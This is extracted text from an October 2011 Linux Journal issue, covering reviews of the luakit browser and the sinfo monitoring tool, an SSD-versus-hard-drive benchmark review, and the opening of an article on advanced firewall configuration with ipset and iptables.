NEW PROJECTSluakit KeyboardCommandsThese are the most importantbindings for basic usage (seethe documentation for more):■ i — insert mode.■ : — command mode.■ Ctrl-z — passthrough mode.■ o — open URL.■ t — open URL in new tab.■ w — open URL in new window.■ d/Ctrl-w — close tab.■ D/ZQ — close window.■ ZZ — save session and close window.modern-minimalist, part old-school hacker.Entering a URL or even clicking Back mayleave the uninitiated a little shocked, asthe GUI elements one takes for granted areseemingly nonexistent. However, the twomain UI elements unlock them immediately:right-clicking and the input bar.Starting with the input bar, you canenter URLs with o, t or w to open URLs inthe same tab, a new tab or a new window,respectively. Right-clicking provides controlslike Back, Forward, Stop and so on.On the subject of tabs, not only was Iimpressed by their presence in this lightweightbrowser, but they’re also by far the coolesttabs I ever have seen. They nearly blendinto the background (perhaps part of theirmystique), and at first I didn’t even noticetheir presence. Open some new tabs with t,and the tabs at the top of the browser startdividing evenly, with the active tab a strongblack, and the inactive tabs techy-gray.Much to my surprise (given luakit’sminimalist nature) Flash appeared to workwithout any worries, with YouTube as myfirst test. Indeed, many pages I thoughtwouldn’t stand a chance, loaded in a waythat was both accurate and stable.Nevertheless, the actual browsing aspectis only half the equation when consideringluakit, whose real appeal lies in its endlesscustomizability. The entire browser isconstructed by a series of config files, whichdo all kinds of things, like change what partsof the browser are loaded and in which order,define button combinations and so on.Regarding this, Mason gave a greatresponse to one of my leading questionsthat was long and detailed, and it will appealto anyone who knows what they’re doing.Check the Web site if you want to see it.For the modder who is about jump intocoding, luakit’s Web site has something I’venever actually come across. Unlike 99%of us who just start coding randomly, theWeb site has a whole Data Structure Index,explaining each file with flowcharts and48 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


NEW PROJECTSdocumented references—the way we weretaught but always avoided!If any programmers are looking to helpout with luakit, Mason recommends portinga Firefox or Chrome plugin that you can’t livewithout. A simple method for ad-blockingalso would be greatly appreciated.At the end of the day, this is one ofthose projects that will inspire great loyaltyamong its fans with its own unique style.And if any film-makers working on a hackermovie are reading this and looking for abrowser that looks Neo-from-The-Matrixcool, this is the one.sinfo displays invaluable system informationover multiple PCs for easy administration.sinfo—Advanced NetworkMonitoringwww.ant.uni-bremen.de/whomes/rinas/sinfoAre you looking to set up some kind ofnetwork cluster, but dealing with manydifferent computers, all of which are nearlyimpossible to keep track of? What if you’rein charge of a room full of computers andalso of those who are using them (some ofwhom may be looking to slack off or runsomething I’ll politely dub “objectionable”)?sinfo may be what you’re looking for.According to its Freshmeat entry:sinfo is a monitoring tool that uses abroadcast scheme to distribute informationon the status of each computer on yourlocal network. It supports CPU, memoryusage, network load and informationabout the top five processes on eachcomputer. sinfo uses ncurses to displaythe information in an attractive manner.Further extending sinfo’s use with the -sswitch provides even meatier information.Installation A binary is available forthose with Debian-based systems, suchas Debian, Ubuntu and the like, andchances are that it’s already sitting inyour repository. Given that this softwarealso includes a startup dæmon, sinfod, Ithoroughly recommend taking the binaryoption if you can, because a great deal of theprocess is automated (it’s also the versionI cover here). Nevertheless, in the interestsWWW.LINUXJOURNAL.COM / OCTOBER <strong>2011</strong> / 49


NEW PROJECTSof distro neutrality, I also cover the sourceversion during the installation, as usual.As far as library requirements areconcerned, you need the following,according to the documentation:■ ncurses: libraries for terminal handling(tested with version 5.7).■ boost: peer-reviewed portable C++source libraries using Boost.Bind andBoost.Signals (tested with version 1.42).■ asio (>=1.1.0): asio is a cross-platformC++ library for network programming(tested with version 1.4.1).If you’re compiling from source, youneed the pesky developer packages as well(-dev). The number of packages underlibboost- in particular are quite extensive,so if you run into any problems duringmake, the libboost libraries may be theculprit, requiring more of its packagesbefore you can install properly.For those running with source, onceyou have the library requirements out ofthe way, grab the latest tarball and extractit. Open a terminal in the new folder andenter the following commands:$ ./configure$ makeIf your distro uses sudo:$ sudo make installIf your distro uses root:$ su# make installBefore I continue, I should explain thatsinfo is broken into two parts: the everydayapplication and the background dæmon.As for installing the dæmon, I’m going toleave this part to you, because it seemsthat just about every distro has a differentmethod of dealing with startup processes(and the Debian package takes care ofall that). Check the readme files in thesource tarball and the Web site for moreinformation if you’re still using the source.Usage sinfo is a “semi-GUI” commandlineprogram that’s actually pretty easy to use,although advanced users can make it do somepretty cool stuff via command-line switches. Torun the program in its basic mode, simply enter:$ sinfoAssuming that you have sinfo installedonly on your machine for now, theinformation being displayed will be justthat of your machine. From this screen, yousee all kinds of useful information, such asavailable memory, CPU utilization, hostnamesand so on. The sinfo Keyboard Commandssidebar shows a list of the keyboardcommands that drive sinfo, toggling partsof the program with a single keystroke.However, in this state, it’s really just aglorified version of top. The whole pointis that you can display information from50 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


NEW PROJECTSseveral machines at once to keep tabs on aLAN. If the other PCs on your network havesinfo in their distro’s repository, it shouldbe as easy as installing sinfo via apt-getand the like, then running the program onthose machines. As soon as I did that ona second machine, voilà, both PCs weredisplaying under both installations. Keepinstalling it on other networked PCs, andthe list will grow larger and larger.Those are the basics out of the way,but what about the extended features?Obviously, I don’t have the space to covereverything here (and you really shouldcheck the man page for more details), butlet’s look at some of my favorite features.At the command line, if you add the-W switch (or alternatively --wwwmode)like so:$ sinfo -Wthe output changes from the usual top-likescreen to HTML output instead—very handyfor those into things like remote administrationwith automated Web pages and whatnot.This is slightly redundant while in thesinfo user interface (simply press thes key), but it’s awesome when doingsome kind of command-line scripting:add the switch -s (or alternatively--systeminfo), and a big chunk ofserious system information is output aswell. As an example, my two machines


NEW PROJECTShad the following extra information:192.168.1.2 knightro-bigdesktop i686<strong>Linux</strong> 2.6.32-27-generic #49-Ubuntu SMP Wed Decpus: 4 MHz: 800.0RAM: 3276.5 MByte swap: 7629.4 Mbyteload 1min: 0.0 load 5min: 0.1 load 15min: 0.1192.168.1.1 nhoj-desktop x86_64<strong>Linux</strong> 2.6.38-8-generic #42-Ubuntu SMP Mon Apr 11 0cpus: 2 MHz: 1000.0RAM: 2007.6 MByte swap: 2047.3 Mbyteload 1min: 0.1 load 5min: 0.2 load 15min: 0.1uptime 0 days, 19:13:03sinfo KeyboardCommands■ q — quit sinfo.■ Page up, Page down — scrollthe screen by one page.■ Up arrow/u, down arrow/d —scroll the screen by one line.■ Home — jump to the top line.This kind of information suggests manypotential uses, and keeping watch andtroubleshooting at LAN parties springsinstantly to mind. If any one node is havingtrouble, there’s a good chance that the hostwill be able to hit the ground running whentrying to isolate the problem.In the end, sinfo is not only well designed,but if it’s installed as binary, it’s also convenient.Ultimately, I think this application will carveout an instant niche for itself, and hopefully,it will turn into one of those standardapplications that are so commonplace, theyjust become part of the landscape. Maybeporting it would do exactly that.■John Knight is a 27-year-old, drumming- and bass-obsessedmaniac, studying Psychology at Edith Cowan University in WesternAustralia. He usually can be found playing a kick-drum far too much.■ s — toggle display of systeminformation.■ o — toggle display of your ownprocesses.■ n — toggle display of networkinformation.■ D — toggle display of disk load.■ t — toggle display of the top Xprocesses.■ c — toggle the scaling of theCPU load bars from “log”, “lin”to full.BREWING SOMETHING FRESH, INNOVATIVE OR MIND-BENDING? Send e-mail to newprojects@linuxjournal.com.52 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


REVIEWHARDWAREReturn toSolid StateAre modern SSDs worth the price if you use <strong>Linux</strong>? KYLE RANKINThree years ago, I first reviewed anSSD (solid-state drive) under <strong>Linux</strong>(www.linuxjournal.com/article/10094).At the time, I had an ultra-portablelaptop with a 4200rpm hard drive thatreally bogged down the performance onwhat was otherwise a pretty snappy littlemachine. Although there definitely wereSSD reviews around, I didn’t notice manycomprehensive reviews for <strong>Linux</strong>. Instead offocusing strictly on benchmarks, I decidedto focus more on real-world tests. In theend, I saw dramatic increases in speed forthe SSD compared to my 4200rpm drive.That may have been true back then,but what about today? For example, onething that always bothered me aboutmy first comparison was the fact thatat the time, I had only a 4200rpm 1.8"drive available to me, and I was limitedby my ATA/66 bus speed. My new laptop,a Lenovo ThinkPad X200s, came witha 7200rpm 2.5" SATA drive, and eversince I got the laptop, I’ve been curiousto repeat my experiment with modernequipment. How would a modern SSDhold up to a modern 7200rpm SATA"drive in real-world <strong>Linux</strong> use? Recently,Intel was kind enough to provide mewith a review unit of its new 320 SSDline, a follow-up to the X25 SSD line, soI decided to repeat my experiments.My Testing MethodologyAs in the previous review, I focus mostlyon real-world performance tests, but I stillthrow in some raw benchmark numbers forthose of you in the crowd who are curious.Where it made sense, I ran multiple teststo confirm I got consistent results, andhere, I report the best performance foreach drive. Also, when I was concernedabout file-caching skewing results, I bootedthe machine from scratch before a test.The 7200rpm drive is a 160GB FujitsuMHZ2160B, and after its tests, I transferredan identical filesystem to the 160GB Intel320 SSD.54 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


REVIEWEditor’s Note: All SSDs Are Not Created Equal(see the video at http://www.linuxjournal.com/video-ssd-editor-note)Test 1: GRUB to Log InI’ll be honest, I actually don’t boot mylaptop all that much. My battery life isgood enough that I usually just close thelaptop lid when I’m not using it; it suspendsto RAM, and I resume my session later.That said, distributions, such as Ubuntu,have focused on boot times in the pastcouple releases, and my 7200rpm driveseemed to boot Ubuntu 10.04 pretty fast,so I was curious whether I even would seean improvement with the SSD. I used astopwatch to measure the time betweenpressing Enter at the GRUB prompt to whenI saw the login screen. The boot processis both processor- and disk-intensive, andalthough the 7200rpm was fast, it turnsout there still was room for improvement:■ 7200rpm: 27 seconds■ SSD: 16 secondsWWW.LINUXJOURNAL.COM / OCTOBER <strong>2011</strong> / 55


REVIEWTest 2: Log In to DesktopThe next logical test was to time how longit takes from the login screen until reachinga full, functioning desktop. In my case,that meant I started the stopwatch after Ityped my password and pressed Enter, andI stopped the stopwatch once my desktoploaded and my terminals and Firefoxappeared on the screen. In this case, theSSD really stood out by loading my desktopin less than half the time:■ 7200rpm: 22 seconds■ SSD: 9 secondsTest 3: hdparmFor the next test, I ran hdparm with itstraditional -Tt benchmarking options onboth drives. Although not as full-featuredas Bonnie++, the fact that hdparm outputsonly a few metrics definitely makes it easierto do a comparison:7200rpm:$ sudo hdparm -Tt /dev/sda6/dev/sda6:As you can see in these results, the SSDwas a bit faster with cached reads but notby as much of a margin as in the past tests.That said, the buffered disk readers, again,were about twice as fast. This far along inthe tests I started to notice a pattern: theSSD seems to be about two times as fastas my 7200rpm drive for most of the tests.The real question for me was whether itwill maintain that kind of performancethrough the rest of the tests.Test 4: Bonnie++Although hdparm can be useful for gettingbasic hard drive performance metrics, whenyou want detailed information and a largerrange of tests, Bonnie++ is the program touse. The downside, of course, is that you geta huge amount of benchmark data to wadethrough. I won’t go through metric by metric.Instead, I show the output from the commandsbut talk about only a few highlights:7200rpm (output modified to fit):------Sequential Output------ --Sequential Input- --Random--Per Chr- --Block-- -Rewrite- -Per Chr- --Block-- --Seeks--K/sec %CP K/sec %CP K/sec %CP K/sec %CP K/sec %CP /sec %CPTiming cached reads:6748 MB in 1.99 seconds = 3383.99 MB/sec186 99 71090 17 33138 19 1251 97 83941 17 175.2 4Timing buffered disk reads: 220 MB in 3.01 seconds = 73.08 MB/secSSD:Latency49232us 1079ms 759ms 54918us 188ms 294ms------Sequential Create------ --------Random Create--------$ sudo hdparm -Tt /dev/sda6/dev/sda6:-Create-- --Read--- -Delete-- -Create-- --Read--- -Delete--/sec %CP /sec %CP /sec %CP /sec %CP /sec %CP /sec %CPTiming cached reads:7168 MB in 1.99 seconds = 3595.46 MB/sec258 2 +++++ +++ 369 3 345 3 +++++ +++ 323 3Timing buffered disk reads: 500 MB in 3.00 seconds = 166.48 MB/secLatency314ms 633us 150ms 151ms 486us 398ms56 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


REVIEWSSD (output modified to fit):------Sequential Output------ --Sequential Input- --Random--Per Chr- --Block-- -Rewrite- -Per Chr- --Block-- --Seeks--K/sec %CP K/sec %CP K/sec %CP K/sec %CP K/sec %CP /sec %CP187 99 164010 40 85149 32 1325 99 297390 60 4636 124Latency52047us 423ms 336ms 21716us 12432us 9048us------Sequential Create------ --------Random Create---------Create-- --Read--- -Delete-- -Create-- --Read--- -Delete--/sec %CP /sec %CP /sec %CP /sec %CP /sec %CP /sec %CP9079 56 +++++ +++ 10451 63 8292 60 +++++ +++ 7043 61Latency5177us 283us 5218us 10723us 30us 16179usOkay, that is a lot of data to go through,so let’s just pick out a few metrics tohighlight. What I found interesting wasthat except for the tests where the CPUwas a limiting factor (like Per-Charactertests), the SSD seemed to have dramaticallybetter performance than the 7200rpmdrive. The SSD is around twice as fast asthe 7200rpm drive in Sequential OutputBlock and Rewrite tests (71,090 K/sec vs.164,010 K/sec and 33,138 K/sec vs. 85,149K/sec, respectively). Switching to reads andrandom seeks though, there’s a much widergap, such as in the Block test (83,941 K/secvs. 297,390 K/sec), and the random seeks(a known strength for SSDs) are almost noPolywell SolutionsNetDisk 8074A72 Bay 144TB $26,99974 Bay 222TB $36,999Quiet Storage NAS/SAN/iSCSI- 4x Gigabit LAN- RAID-5, 6, 0, 1, 10- Hot Swap, Hot Spare- <strong>Linux</strong>, Windows, Mac2U12B 2U-12Bay 36TB $6,999SATA II, RAID-6, 2x GigaLANNAS/iSCSI/SAN Storage5048APolywell OEM Services, Your Virtual ManufacturerPrototype Development with <strong>Linux</strong>/FreeBSD SupportSmall Scale to Mass Production ManufacturingFulfillment, Shipping and RMA Repairs5U-48Bay 144TB $26,999RAID-6, NAS/iSCSI/SAN StorageSATA, 4x GigaLANNetdisk 8000VQuiet Performance- Dual Gigabit LAN- RAID-5, 6, 0, 1, 10- Hot Swap, Hot Spare- E-mail Notification- Tower Case4U24A 4U-24Bay 72TB $12,950RAID-6, NAS/iSCSI/SAN StorageMix SAS/SATA, 4x Giga/10Gbit LANMore Choices, Excellent Service,Great Prices!9020H 20Bay60TB $9,999- 4x Gigabit LAN- RAID-5, 6, 0, 1, 10- Hot Swap, Hot Spare- <strong>Linux</strong>, Windows, Mac- E-mail Notification- Tower Case9015H 15Bay45TB $7,75030TB $4,999- Dual Gigabit LAN- RAID-5, 6, 0, 1, 10- Hot Swap, Hot Spare- <strong>Linux</strong>, Windows, Mac- E-mail Notification- Tower Case20 Years of Customer Satisfaction888.765.96865-Year Warranty, Industry's LongestFirst Class Customer Servicelinuxsales@polywell.comwww.polywell.com/usPolywell Computers, Inc 1461 San Mateo Ave. South San Francisco, CA 94080 650.583.7222 Fax: 650.583.1974NVIDIA, ION, nForce, GeForce and combinations thereof are trademarks of NVIDIA Corporation. Other names are for informational purposes only and may be trademarks of their respective owners.Silent Eco Green PC- Intel® / AMD® CPU- Energy efficient- Quiet and LowVoltage Platformstarts at $199LD-001OLYPOLYWELL


REVIEWcomparison with 175.2 seeks per secondcompared to 4,636.All of that said, it’s with the file creationtests that the SSD performance reallyshines. In sequential file creation where the7200rpm drive can create and delete 248and 369 files per second, respectively, theSSD goes through 9,079 and 10,451 filesper second. The same goes for randomfile creation with the 7200rpm’s createand delete scores of 345 and 323 files persecond compared to the SSD’s 8,292 and7,043 files per second. This is really onegood reason why I have included so manyreal-world tests in this review. After all,you can look at some of these numbersand conclude that if you got the SSD, yoursystem may be 20 times faster, yet it’s howthese numbers apply in real applicationsthat ultimately matters.Test 5: VirtualBox Torture TestThe next test I decided to perform wasone that I felt might highlight some ofthe performance advantages of the SSD:virtualization. These days, it’s more andmore reasonable to use an ordinary laptopas a platform to run multiple virtualmachines, and I although I knew thathaving multiple VMs on at the same timehad the tendency to slow down my systemgreatly, I wondered whether the SSD mightshow an improvement. To try to quantifythis, I invented the following test. I set uptwo identical VirtualBox VMs pointed at thesame Ubuntu Server .iso file. Both systemswere given their own dynamically allocatedvirtual hard drive. Then, I booted the VMs,and at the boot screen, I pointed them toa kickstart file I created to automate theUbuntu Server installation process. I startedthe stopwatch the moment I pressed Enteron one of the VMs, then quickly started thesecond at the same time. I didn’t stop thestopwatch until the last system rebootedand showed my login screen. What I figuredwas that having both VMs read from thesame .iso file and write to separate virtualdisks on the same physical hard drive wouldbe a good torture test for the drive. Toavoid any issues with file caches, when itcame to the SSD, I created all new VMs withnew disks. Here are the results:■ 7200rpm: 11 minutes, 7 seconds■ SSD: 10 minutes, 32 secondsI admit these results really surprised me.I was expecting a much more dramaticdifference, but it turned out that althoughthe test really sounded like one that wouldwork out the hard drives, in both cases,it was my dual-core CPU that got theworkout. It goes to show that disk I/O isn’talways the bottleneck, and sometimes afaster drive doesn’t make everything faster.Test 6: Filesystem TraversalFor the final test, I wanted to compare howfast both drives allowed me to traverse thefilesystem. In my February 2008 column(www.linuxjournal.com/article/9944), Italked about how to clean up space on your58 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


REVIEWWhen it’s done, it creates a tally that showsyou not only which overall directories takeup the most space, but also which directorieswithin them are the real culprits.hard drive using the “duck command” or:$ cd /$ du -ck | sort -nThis command traverses the entirefilesystem and calculates how much spaceis being taken up by the files in eachdirectory recursively. When it’s done, itcreates a tally that shows you not onlywhich overall directories take up the mostspace, but also which directories withinthem are the real culprits. Because I realizedthat the sort command wouldn’t help metest the disks at all, I skipped it and justtimed how long it took to run du -ck


REVIEWstarting from /:7200rpm:real 5m25.551suser 0m2.700ssys 0m18.589sSSD:real 0m41.663suser 0m2.040ssys 0m13.453sThis result also really surprised me. Basedon some of my other tests, I thought theSSD would be faster but only by arounda factor of two. I definitely didn’t expectthe SSD to complete the test in an eighthof the time. I think part of this must haveto do with the dramatically better randomseek performance.ConclusionWhen it comes to SSDs, most peoplethese days realize that this performancedoes come at a price. The question is,is it worth it? Honestly, that’s a difficultquestion to answer. After all, in a good dealof my tests, I did see two times or betterperformance out of the SSD, and in somecases, dramatically better performance.I also must admit that I saw other moresubtle improvements. For example, whenmy network backup job ran on my 7200rpmdrive, I definitely would notice as my systemslowed to a crawl. In fact, sometimes I’deven kill the rsync and run the backup later,because I could barely browse the Web.On the SSD, I didn’t even notice when thebackup ran. When it comes to performance,by the way, I should note that right now,not only does the Intel 320 series of driveshave a wide range of prices depending onwhat size drive you get, according to Intel’sproduct page, the lower-capacity drivesactually tout reduced speeds.This particular 160GB drive currently retailsfor around $300 on-line. Although it’s truethat’s a lot of money for 160GB of storage,honestly, I tend to store bulk files on a fileserver at home. Back when 32GB SSDs werethe affordable norm, you had to make somestorage sacrifices for speed, but at this point,I am comfortable with the 160GB drive mylaptop came with. It really does just comedown to price. You will have to make yourown judgment based on the price versus theperformance; however, an important factor forme that makes me lean toward the SSD is howmuch extra life it gives to my current laptop.The processor and RAM in this laptop are morethan adequate for my daily needs, and reallyany performance issues I’ve ever had with themachine could be traced back to the storage.I expect with the increased performance ofan SSD, I could get another few years out ofa laptop I already have had for quite sometime—a laptop that would cost much morethan the price of an SSD to replace.■Kyle Rankin is a Sr. Systems Administrator in the San FranciscoBay Area and the author of a number of books, including TheOfficial Ubuntu Server Book, Knoppix Hacks and Ubuntu Hacks. Heis currently the president of the North Bay <strong>Linux</strong> Users’ Group.60 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


<strong>2011</strong>8th AnnualHIGH PERFORMANCE COMPUTINGON WALL STREET Show and ConferenceSeptember 19, <strong>2011</strong> (Monday)www.flaggmgmt.com/hpcHigh Performance Computing, Low Latency, Networks, DataCenters, Cost Savings – the largest meeting of High PerformanceComputing in New York in <strong>2011</strong>.This HPC networking opportunity will assemble 800 Wall Street ITprofessionals at one time and one place in New York in September <strong>2011</strong>.This show will cover High Performance Computing, High FrequencyTrading, Low Latency, Networks and Switch Solutions, Data Centers,Virtualization, Grid, Blade, Cluster, overcoming Legacy systems.Our Show is an efficient one-day showcase and networkingopportunity.Register in advance for the full conference program whichincludes general sessions, drill down sessions, an industry luncheon,coffee breaks, exclusive viewing times in the exhibits, and more. Save$100. $295 in advance. $395 on site.Don’t have time for the full Conference? Attend the free Show.Register in advance at: www.flaggmgmt.com/hpcSAVETHE DATERoosevelt Hotel, NYCMadison Ave and 45th St, next to Grand Central StationRegister today online. See HPC, Low Latency, Networks, Data Centers,Speed, Cost Savings. Wall Street markets will assemble at the <strong>2011</strong>HPC Sept. 19 show to see these new systems live on the show floor.SponsorsWall Street IT speakers and Gold Sponsors will lead drill-down sessionsin the Grand Ballroom program.This Show is a networking opportunity for the entire IT community.Global InvestmentTechnologyShow Hours: Mon, Sept 19 8:00 - 4:00Conference Hours: 8:30 - 4:50Show & Conference:Flagg Management Inc353 Lexington Ave, NY10016(212) 286 0333 flaggmgmt@msn.comVisit: www.flaggmgmt.com/hpc


ADVANCEDFIREWALLCONFIGURATIONSwith ipsetWith significant performance gains and powerful extrafeatures—LIKE THE ABILITY TO APPLY SINGLE FIREWALLRULES TO ENTIRE GROUPS OF HOSTS AND NETWORKS ATONCE—ipset may be iptables’ perfect match.HENRY VAN STYNiptables is the user-space tool forconfiguring firewall rules in the <strong>Linux</strong>kernel. It is actually a part of thelarger netfilter framework. Perhapsbecause iptables is the most visible partof the netfilter framework, the frameworkis commonly referred to collectively asiptables. iptables has been the <strong>Linux</strong>firewall solution since the 2.4 kernel.ipset is an extension to iptables thatallows you to create firewall rules that matchentire “sets” of addresses at once. Unlikenormal iptables chains, which are stored andtraversed linearly, IP sets are stored in indexeddata structures, making lookups very efficient,even when dealing with large sets.Besides the obvious situations whereyou might imagine this would be useful,such as blocking long lists of “bad” hostswithout worry of killing system resourcesor causing network congestion, IP sets alsoopen up new ways of approaching certain62 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


aspects of firewall design and simplify manyconfiguration scenarios.In this article, after quickly discussingipset’s installation requirements, I spend abit of time on iptables’ core fundamentalsand concepts. Then, I cover ipset usage andsyntax and show how it integrates withiptables to accomplish various configurations.Finally, I provide some detailed and fairlyadvanced real-world examples of how ipsetscan be used to solve all sorts of problems.Because ipset is just an extension toiptables, this article is as much aboutiptables as it is about ipset, althoughthe focus is those features relevant tounderstanding and using ipset.Getting ipsetipset is a simple package option in manydistributions, and since plenty of otherinstallation resources are available, I don’tspend a whole lot of time on that here.The important thing to understand is thatlike iptables, ipset consists of both a userspacetool and a kernel module, so youneed both for it to work properly. You alsoneed an “ipset-aware” iptables binary to beable to add rules that match against sets.Start by simply doing a search for “ipset” inyour distribution’s package management tool.There is a good chance you’ll be able to findan easy procedure to install ipset in a turnkeyway. In Ubuntu (and probably Debian),install the ipset and xtables-addons-sourcepackages. Then, run module-assistantauto-install xtables-addons, andipset is ready to go in less than 30 seconds.Figure 1. iptables Built-in Chains Traversal OrderIf your distro doesn’t have built-insupport, follow the manual installationprocedure listed on the ipset home page(see Resources) to build from source andpatch your kernel and iptables.The versions used in this article are ipsetv4.3 and iptables v1.4.9.iptables OverviewIn a nutshell, an iptables firewall configurationconsists of a set of built-in “chains” (groupedinto four “tables”) that each comprise a list of“rules”. For every packet, and at each stage ofprocessing, the kernel consults the appropriatechain to determine the fate of the packet.Chains are consulted in order, based onthe “direction” of the packet (remote-tolocal,remote-to-remote or local-to-remote)and its current “stage” of processing(before or after “routing”). See Figure 1.When consulting a chain, the packet iscompared to each and every one of theWWW.LINUXJOURNAL.COM / OCTOBER <strong>2011</strong> / 63


FEATURE Advanced Firewall Configurations with ipsetFigure 2. Anatomy of an iptables Commandchain’s rules, in order, until it matches arule. Once the first match is found, theaction specified in the rule’s target is taken.If the end of the chain is reached withoutfinding a match, the action of the chain’sdefault target, or policy, is taken.A chain is nothing more than an orderedlist of rules, and a rule is nothing morethan a match/target combination. A simpleexample of a match is “TCP destination port80”. A simple example of a target is “acceptthe packet”. Targets also can redirect toother user-defined chains, which provide amechanism for the grouping and subdividingof rules, and cascading through multiplematches and chains to arrive finally at anaction to be taken on the packet.Every iptables command for definingrules, from the very short to the very long,is composed of three basic parts thatspecify the table/chain (and order), thematch and the target (Figure 2).To configure all these options and createa complete firewall configuration, you run aseries of iptables commands in a specific order.iptables is incredibly powerful andextensible. Besides its many built-in features,iptables also provides an API for custom“match extensions” (modules for classifyingpackets) and “target extensions” (modules forwhat actions to take when packets match).Enter ipsetipset is a “match extension” for iptables.To use it, you create and populate uniquelynamed “sets” using the ipset commandlinetool, and then separately referencethose sets in the match specification of oneor more iptables rules.A set is simply a list of addresses storedefficiently for fast lookup.Take the following normal iptablescommands that would block inbound trafficfrom 1.1.1.1 and 2.2.2.2:iptables -A INPUT -s 1.1.1.1 -j DROPiptables -A INPUT -s 2.2.2.2 -j DROPThe match specification syntax -s1.1.1.1 above means “match packetswhose source address is 1.1.1.1”. To blockboth 1.1.1.1 and 2.2.2.2, two separateiptables rules with two separate matchspecifications (one for 1.1.1.1 and one for2.2.2.2) are defined above.Alternatively, the following ipset/iptablescommands achieve the same result:ipset -N myset iphashipset -A myset 1.1.1.164 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


ipset -A myset 2.2.2.2iptables -A INPUT -m set --set myset src -j DROPThe ipset commands above create a newset (myset of type iphash) with twoaddresses (1.1.1.1 and 2.2.2.2).The iptables command then referencesthe set with the match specification -m set--set myset src, which means “matchpackets whose source header matches (thatis, is contained within) the set named myset”.The flag src means match on “source”.The flag dst would match on “destination”,and the flag src,dst would match onboth source and destination.In the second version above, only oneiptables command is required, regardlessof how many additional IP addresses arecontained within the set. Although thisexample uses only two addresses, youcould just as easily define 1,000 addresses,and the ipset-based config still wouldrequire only a single iptables rule, while theprevious approach, without the benefit ofipset, would require 1,000 iptables rules.Set TypesEach set is of a specific type, which defineswhat kind of values can be stored in it (IPaddresses, networks, ports and so on) aswell as how packets are matched (that is,what part of the packet should be checkedand how it’s compared to the set). Besidesthe most common set types, which checkthe IP address, additional set types areavailable that check the port, the IP addressand port together, MAC address and IPaddress together and so on.Each set type has its own rules for thetype, range and distribution of values itcan contain. Different set types also usedifferent types of indexes and are optimizedfor different scenarios. The best/mostefficient set type depends on the situation.The most flexible set types are iphash,which stores lists of arbitrary IP addresses,and nethash, which stores lists of arbitrarynetworks (IP/mask) of varied sizes. Referto the ipset man page for a listing anddescription of all the set types (there are 11in total at the time of this writing).The special set type setlist also is available,which allows grouping several sets togetherinto one. This is required if you want tohave a single set that contains both singleIP addresses and networks, for example.Advantages of ipsetBesides the performance gains, ipsetalso allows for more straightforwardconfigurations in many scenarios.If you want to define a firewall conditionthat would match everything but packetsfrom 1.1.1.1 or 2.2.2.2 and continueprocessing in mychain, notice that thefollowing does not work:iptables -A INPUT -s ! 1.1.1.1 -g mychainiptables -A INPUT -s ! 2.2.2.2 -g mychainIf a packet came in from 1.1.1.1, itwould not match the first rule (becausethe source address is 1.1.1.1), but it wouldmatch the second rule (because the sourceWWW.LINUXJOURNAL.COM / OCTOBER <strong>2011</strong> / 65


FEATURE Advanced Firewall Configurations with ipsetaddress is not 2.2.2.2). If a packet came infrom 2.2.2.2, it would match the first rule(because the source address is not 1.1.1.1).The rules cancel each other out—all packetswill match, including 1.1.1.1 and 2.2.2.2.Although there are other ways to constructthe rules properly and achieve the desiredresult without ipset, none are as intuitive orstraightforward:ipset -N myset iphashipset -A myset 1.1.1.1ipset -A myset 2.2.2.2iptables -A INPUT -m set ! --set myset src -g mychainIn the above, if a packet came in from1.1.1.1, it would not match the rule (becausethe source address 1.1.1.1 does match the setmyset). If a packet came in from 2.2.2.2, itwould not match the rule (because the sourceaddress 2.2.2.2 does match the set myset).Although this is a simplistic example, itillustrates the fundamental benefit associatedwith fitting a complete condition in a singlerule. In many ways, separate iptables rulesare autonomous from each other, and it’s notalways straightforward, intuitive or optimalto get separate rules to coalesce into a singlelogical condition, especially when it involvesmixing normal and inverted tests. ipset justmakes life easier in these situations.Another benefit of ipset is that sets canbe manipulated independently of activeiptables rules. Adding/changing/removingentries is a trivial matter because theinformation is simple and order is irrelevant.Editing a flat list doesn’t require a wholelot of thought. In iptables, on the otherhand, besides the fact that each rule is asignificantly more complex object, the orderof rules is of fundamental importance, soin-place rule modifications are much heavierand potentially error-prone operations.Excluding WAN, VPN and Other RoutedNetworks from the NAT—the Right WayOutbound NAT (SNAT or IP masquerade)allows hosts within a private LAN to accessthe Internet. An appropriate iptables NATrule matches Internet-bound packetsoriginating from the private LAN andreplaces the source address with theaddress of the gateway itself (making thegateway appear to be the source host andhiding the private “real” hosts behind it).NAT automatically tracks the activeconnections so it can forward returnpackets back to the correct internal host (bychanging the destination from the addressof the gateway back to the address of theoriginal internal host).Here is an example of a simple outboundNAT rule that does this, where 10.0.0.0/24is the internal LAN:iptables -t nat -A POSTROUTING \-s 10.0.0.0/24 -j MASQUERADEThis rule matches all packets comingfrom the internal LAN and masqueradesthem (that is, it applies “NAT” processing).This might be sufficient if the only route isto the Internet, where all through traffic isInternet traffic. If, however, there are routes66 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


to other private networks, such as with VPNor physical WAN links, you probably don’twant that traffic masqueraded.One simple way (partially) to overcome thislimitation is to base the NAT rule on physicalinterfaces instead of network numbers (thisis one of the most popular NAT rules given inon-line examples and tutorials):iptables -t nat -A POSTROUTING \-o eth0 -j MASQUERADEThis rule assumes that eth0 is theexternal interface and matches all packetsthat leave on it. Unlike the previous rule,packets bound for other networks thatroute out through different interfaces won’tmatch this rule (like with OpenVPN links).Although many network connections mayroute through separate interfaces, it is notsafe to assume that all will. A good exampleis KAME-based IPsec VPN connections (suchas Openswan) that don’t use virtual interfaceslike other user-space VPNs (such as OpenVPN).Another situation where the aboveinterface match technique wouldn’t work isif the outward facing (“external”) interface isconnected to an intermediate network withroutes to other private networks in additionto a route to the Internet. It is entirelyplausible for there to be routes to privatenetworks that are several hops away and onthe same path as the route to the Internet.Designing firewall rules that rely onmatching of physical interfaces can placeartificial limits and dependencies on networktopology, which makes a strong case for it tobe avoided if it’s not actually necessary.As it turns out, this is another greatapplication for ipset. Let’s say that besidesacting as the Internet gateway for thelocal private LAN (10.0.0.0/24), yourbox routes directly to 